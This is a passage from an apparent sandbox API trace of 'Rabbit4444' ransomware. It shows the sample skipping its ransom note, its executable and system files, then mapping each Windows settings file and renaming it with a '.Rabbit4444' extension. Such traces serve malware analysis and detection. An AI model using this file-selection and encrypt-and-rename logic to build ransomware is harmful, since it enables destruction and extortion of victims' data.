dwReserved1=0x0, cFileName="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", cAlternateFileName="CL4CAB~1.SET")) returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2=".") returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="..") returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="windows") returned -1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="boot") returned 1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.696] lstrcmpiW (lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.696] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms" | out: lpString1="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms") returned="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms" [0059.696] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.697] lstrlenW (lpString="Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms") returned 64 [0059.697] lstrlenW (lpString="Rabbit4444") returned 10 [0059.697] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.697] lstrlenW (lpString=".dll") returned 4 [0059.697] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.697] lstrlenW (lpString=".lnk") returned 4 [0059.697] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.697] lstrlenW (lpString=".ini") returned 4 [0059.697] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.697] lstrlenW (lpString=".sys") returned 4 [0059.697] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.697] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.697] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15100808203) returned 1 [0059.697] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=824) returned 1 [0059.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.697] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0059.699] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0059.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15101172776) returned 1 [0059.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.701] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.701] CloseHandle (hObject=0x298) returned 1 [0059.701] CloseHandle (hObject=0x278) returned 1 [0059.701] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms.Rabbit4444") returned 192 [0059.701] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.702] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577b2a9e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x577b2a9e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", cAlternateFileName="CL6182~1.SET")) returned 1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2=".") returned 1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="..") returned 1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="windows") returned -1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.702] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="boot") returned 1 [0059.703] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.703] lstrcmpiW (lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.703] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms" | out: lpString1="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms") returned="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms" [0059.703] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.703] lstrlenW (lpString="Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms") returned 64 [0059.703] lstrlenW (lpString="Rabbit4444") returned 10 [0059.703] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.703] lstrlenW (lpString=".dll") returned 4 [0059.703] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.703] lstrlenW (lpString=".lnk") returned 4 [0059.703] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.703] lstrlenW (lpString=".ini") returned 4 [0059.703] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.703] lstrlenW (lpString=".sys") returned 4 [0059.703] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2e71049-6f88-4a3b-9475-5a2b40b36092}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.703] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.703] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15101424682) returned 1 [0059.704] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1176) returned 1 [0059.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.704] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0059.725] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0059.726] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.726] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.726] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.726] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.726] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15103688358) returned 1 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.726] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.726] CloseHandle (hObject=0x298) returned 1 [0059.726] CloseHandle (hObject=0x278) returned 1 [0059.726] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms.Rabbit4444") returned 192 [0059.727] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2e71049-6f88-4a3b-9475-5a2b40b36092}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f2e71049-6f88-4a3b-9475-5a2b40b36092}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.727] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5784b409, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5784b409, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x220f9a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", cAlternateFileName="CL0717~1.SET")) returned 1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2=".") returned 1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="..") returned 1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="windows") returned -1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.727] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="boot") returned 1 [0059.728] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.728] lstrcmpiW (lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.728] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms" | out: lpString1="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms") returned="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms" [0059.728] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.728] lstrlenW (lpString="Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms") returned 64 [0059.728] lstrlenW (lpString="Rabbit4444") returned 10 [0059.728] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.728] lstrlenW (lpString=".dll") returned 4 [0059.728] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.728] lstrlenW (lpString=".lnk") returned 4 [0059.728] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.728] lstrlenW (lpString=".ini") returned 4 [0059.728] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.728] lstrlenW (lpString=".sys") returned 4 [0059.728] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.728] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f3fd1f8e-b34a-49ae-95b9-5dbeab5bfb49}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.729] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.729] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15103943722) returned 1 [0059.729] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1040) returned 1 [0059.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.729] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.730] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.731] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15104185925) returned 1 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.731] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.731] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.731] CloseHandle (hObject=0x298) returned 1 [0059.731] CloseHandle (hObject=0x278) returned 1 [0059.731] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms.Rabbit4444") returned 192 [0059.731] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f3fd1f8e-b34a-49ae-95b9-5dbeab5bfb49}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f3fd1f8e-b34a-49ae-95b9-5dbeab5bfb49}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.732] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x578e3d75, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x578e3d75, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", cAlternateFileName="CLF050~1.SET")) returned 1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2=".") returned 1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="..") returned 1 [0059.732] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="windows") returned -1 [0059.733] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.733] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.733] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="boot") returned 1 [0059.733] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.733] lstrcmpiW (lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.733] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms" | out: lpString1="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms") returned="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms" [0059.733] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.733] lstrlenW (lpString="Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms") returned 64 [0059.733] lstrlenW (lpString="Rabbit4444") returned 10 [0059.733] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.733] lstrlenW (lpString=".dll") returned 4 [0059.733] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.733] lstrlenW (lpString=".lnk") returned 4 [0059.733] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.733] lstrlenW (lpString=".ini") returned 4 [0059.733] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.733] lstrlenW (lpString=".sys") returned 4 [0059.733] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.733] CreateFileW 